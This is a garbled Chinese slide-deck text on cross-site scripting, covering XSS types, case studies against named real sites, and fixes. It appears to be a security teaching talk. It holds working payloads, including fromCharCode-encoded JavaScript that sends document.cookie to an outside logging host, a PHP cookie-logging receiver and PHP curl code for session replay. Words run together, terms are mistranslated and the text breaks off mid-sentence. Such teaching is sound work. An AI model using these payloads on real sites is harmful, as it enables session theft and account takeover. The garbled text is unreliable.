跨站腳本漏洞分享

跨站腳本漏洞分享盛大在線：徐江濤博客：5、總結(jié)&提問(wèn)跨站腳本漏洞1、跨站腳本漏洞原理及其危害2、跨站腳本漏洞分類3、跨站腳本漏洞及案例4、跨站腳本漏洞修補(bǔ)建議Crosssitescripting簡(jiǎn)稱XSS

原理：利用網(wǎng)站的漏洞向網(wǎng)站的頁(yè)面注入JAVASCRIPT等腳本內(nèi)容。根源：程序的輸入、輸出沒(méi)有考慮平安因素?？缯灸_本漏洞原理及其危害XSSCheatSheet

了解不同瀏覽器和各種特殊的HTML標(biāo)簽如何執(zhí)行腳本。XSS需要使用的關(guān)鍵字'';!--"<XSS>=&{()}各類偽協(xié)議頭：Javascript:vbscript:跨站腳本漏洞原理及其危害CSS樣式表腳本注入

style=xss:expression(eval(String.fromCharCode(105,102,40,119,105,110,100,111,119,46,120,33,61,34,49,34,41,123,97,108,101,114,116,40,34,120,115,115,34,41,59,119,105,110,100,111,119,46,120,61,34,49,34,59,125)))expression變形。Expression實(shí)際內(nèi)容if(window.x!="1"){alert("xss");window.x="1";}跨站腳本漏洞原理及其危害掛馬插入惡意的腳本內(nèi)容，運(yùn)行病毒、木馬。釣魚篡改網(wǎng)頁(yè)內(nèi)容，騙取賬號(hào)、密碼等詐騙行為。劫持會(huì)話讀取會(huì)話COOKIE,傳送給第三方劫持身份。XSSWorm使用AJAX技術(shù)，做幾何趨勢(shì)的增長(zhǎng)傳播?？缯灸_本漏洞原理及其危害非持久型XSS需要從URL傳參，點(diǎn)擊鏈接觸發(fā)。持久型XSSXSS內(nèi)容已存儲(chǔ)到數(shù)據(jù)庫(kù)，寫到固定頁(yè)面。DOMXSSJAVASCRIPT處理數(shù)據(jù)輸出出現(xiàn)漏洞。瀏覽器的漏洞造成的XSS跨站腳本漏洞原理及其危害表單值容易出現(xiàn)XSS搜索框、信息提示、個(gè)人資料、友情鏈接、背景圖片等等。各類表單值、隱藏的表單值都很危險(xiǎn)。跨站腳本漏洞及案例案例跨站腳本漏洞及案例<optionvalue="5">初級(jí)</option><optionvalue="2">中級(jí)</option><optionvalue="3">高級(jí)</option></select><inputname="key"class="f-text"type="text"style="margin-right:15px"value=""><bodyonload=alert(document.cookie)><""/><inputtype="submit"class="f-button"value="搜索課程"/>搜索結(jié)果代碼://speak2me/index.php/Lessons/index/key/%22%3E%3Cbody%20onload%3Dalert(document.cookie)%3E%3C%22/x/39/y/10/非持久XSS過(guò)濾了反斜杠/跨站腳本漏洞及案例HTML代碼:<divclass="share-content"><p><ahref="://"><bodyonload=eval(String.fromCharCode(118,97,114,32,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,112,97,105,116,111,117,98,105,110,103,46,99,110,47,108,111,103,46,112,104,112,63,99,61,39,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,39,34))><aa=""target="_blank">://">持久XSS跨站腳本漏洞及案例劫持會(huì)話攻擊代碼varimg=newImage();img.src="://xss.paitoubing/log.php?c='"+document.cookie+"'"118,97,114,32,105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,112,97,105,116,111,117,98,105,110,103,46,99,110,46,99,110,47,108,111,103,46,112,104,112,63,99,61,39,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,39,34unicode轉(zhuǎn)換成10進(jìn)制編碼跨站腳本漏洞及案例前端驗(yàn)證了非法字符這樣就平安了嗎？跨站腳本漏洞及案例通過(guò)GET方法跳過(guò)前端://group.wealink/groups/search?keyword=%22%3E%3Cbody%20onload=alert(1)%3E%3C%22跨站腳本漏洞及案例通過(guò)PHP函數(shù)strip_tags去掉字符串中包含的任何HTML及PHP的標(biāo)記字符串無(wú)懈可擊？跨站腳本漏洞及案例照樣篡改網(wǎng)頁(yè)真悲劇未過(guò)濾、粗心大意平安隱患跨站腳本漏洞及案例這個(gè)圖、很熟悉吧其實(shí)這是一個(gè)通知、不是過(guò)濾看圖不說(shuō)話、你懂的高級(jí)案例劫持會(huì)話記錄會(huì)話模擬登錄發(fā)送xss給好友刪除個(gè)人信息跨站蠕蟲流程圖高級(jí)案例記錄會(huì)話PHP實(shí)例代碼<?phpif(isset($_REQUEST['c'])){file_put_contents('./hi.log',$_SERVER['REQUEST_TIME']."\n".$_SERVER['QUERY_STRING']."\n",FILE_APPEND);}echo'200ok';模擬登陸PHP實(shí)例代碼function_fetchUrl($url,$cookie){ global$ch; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_REFERER,""); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch,CURLOPT_HEADER,1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch,CURLOPT_COOKIE,$cookie); curl_setopt($ch,CURLOPT_HEADERFUNCTION,'read_header'); $html=curl_exec($ch); curl_close($ch); return$html;}高級(jí)案例ZEND調(diào)試環(huán)境下模擬登陸成功使用htmlspecialchars翻開引號(hào)參數(shù)htmlspecialchars〔$xss,ENT_QUOTES〕&==>&"==>"'==>'//需要翻開引